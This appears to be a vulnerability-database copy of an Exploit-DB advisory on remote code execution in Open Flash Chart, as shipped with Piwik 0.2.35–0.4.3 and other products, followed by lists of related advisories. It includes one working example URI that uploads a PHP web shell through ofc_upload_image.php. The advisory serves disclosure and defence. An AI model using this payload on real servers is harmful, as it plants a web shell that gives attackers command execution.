Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbBraeden ThomasEDB-ID:10532
HistoryDec 17, 2009 - 12:00 a.m.

Piwik Open Flash Chart - Remote Code Execution

2009-12-1700:00:00
Braeden Thomas
www.exploit-db.com
88

AI Score

7.4

Confidence

Low

JSON
Bugtraq ID:  	 37314
Class: 	Input Validation Error
CVE: 	
Remote: 	Yes
Local: 	No
Published: 	Dec 14 2009 12:00AM
Updated: 	Dec 17 2009 06:03PM
Credit: 	Braeden Thomas
Vulnerable: 	Piwik Piwik 0.4.3
Piwik Piwik 0.4.2
Piwik Piwik 0.4.1
Piwik Piwik 0.4
Piwik Piwik 0.2.37
Piwik Piwik 0.2.36
Piwik Piwik 0.2.35
Open Web Analytics Open Web Analytics 1.2.0
Open Flash Chart Open Flash Chart 2.0


Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.

Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected. 

The following example URI is available:

http://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>

Related

exploitdb 5
cvelist 2
prion 2
securityvulns 2
cve 2
packetstorm 2
nvd 2
wpvulndb 7
zdt 1
dsquare 3
checkpoint_advisories 1
openvas 1
seebug 1
metasploit 1
nessus 1
exploitdb
exploitdb
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
2013-04-22 00:00:00
OpenEMR 4.1.1 - &#039;ofc_upload_image.php&#039; Arbitrary File Upload
2013-02-13 00:00:00
Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
2013-10-26 00:00:00
cvelist
cvelist
CVE-2011-4275
2011-11-26 02:00:00
CVE-2009-4140
2009-12-22 22:00:00
prion
prion
Cross site scripting
2011-11-26 03:57:00
Unrestricted file upload
2009-12-22 22:30:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2011-11-27 00:00:00
TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181
2011-11-27 00:00:00
cve
cve
CVE-2011-4275
2011-11-26 03:57:45
CVE-2009-4140
2009-12-22 22:30:00
packetstorm
packetstorm
iTop 1.1.181 Cross Site Scripting
2011-11-23 00:00:00
Open Flash Chart 2 Arbitrary File Upload
2013-10-26 00:00:00
nvd
nvd
CVE-2011-4275
2011-11-26 03:57:45
CVE-2009-4140
2009-12-22 22:30:00
wpvulndb
wpvulndb
chikuncount - ofc_upload_image.php Arbitrary File Upload
2014-08-01 10:58:59
wp-seo-spy-google - ofc_upload_image.php Arbitrary File Upload
2014-08-01 10:58:59
spamtask - ofc_upload_image.php Arbitrary File Upload
2014-08-01 10:58:59
zdt
zdt
Open Flash Chart 2 Arbitrary File Upload Vulnerability
2013-10-26 00:00:00
dsquare
dsquare
OpenX 2.8.6 File Upload
2012-05-01 00:00:00
Piwik 0.4.3 File Upload
2012-05-01 00:00:00
ZonPHP 2.25 File Upload
2014-02-01 00:00:00
checkpoint_advisories
checkpoint_advisories
Joomla ofc_upload_image.php Unrestricted File Upload (CVE-2009-4140)
2014-02-24 00:00:00
openvas
openvas
Piwik 0.2.35 - 0.4.3 PHP Code Execution Vulnerability
2009-12-31 00:00:00
seebug
seebug
Piwik ofc_upload_image.php远程PHP代码执行漏洞
2009-12-25 00:00:00
metasploit
metasploit
OpenEMR PHP File Upload Vulnerability
2013-02-16 12:11:46
nessus
nessus
OpenX Open Flash Chart ofc_upload_image.php File Upload Arbitrary Code Execution
2010-09-17 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:10532
exploitdb5cvelist2prion2securityvulns2cve2packetstorm2nvd2wpvulndb7zdt1dsquare3checkpoint_advisories1openvas1seebug1metasploit1nessus1